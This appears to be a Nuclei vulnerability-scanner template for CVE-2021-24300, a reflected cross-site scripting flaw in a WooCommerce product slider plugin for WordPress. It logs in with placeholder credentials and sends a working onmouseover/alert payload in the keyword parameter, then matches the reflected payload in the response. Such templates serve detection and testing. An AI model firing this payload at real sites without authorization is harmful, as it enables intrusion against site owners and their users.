id: CVE-2021-24300 info: name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting author: cckuailong severity: medium description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24300 cwe-id: CWE-79 epss-score: 0.00259 epss-percentile: 0.63706 cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: pickplugins product: product_slider_for_woocommerce framework: wordpress tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'value="\"onmouseover=alert(document.domain);//">' - "PickPlugins Product Slider" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502204dd9d6349e1efecba15c6dff278a254125707f0f4ec3b385ca17ef4ec9e78a1302210099fe22ac0ebc3fd9b5c64f66f4bcd97edf56883d19bb39f4006efde0e368983d:922c64590222798bb761d5b6d8e72950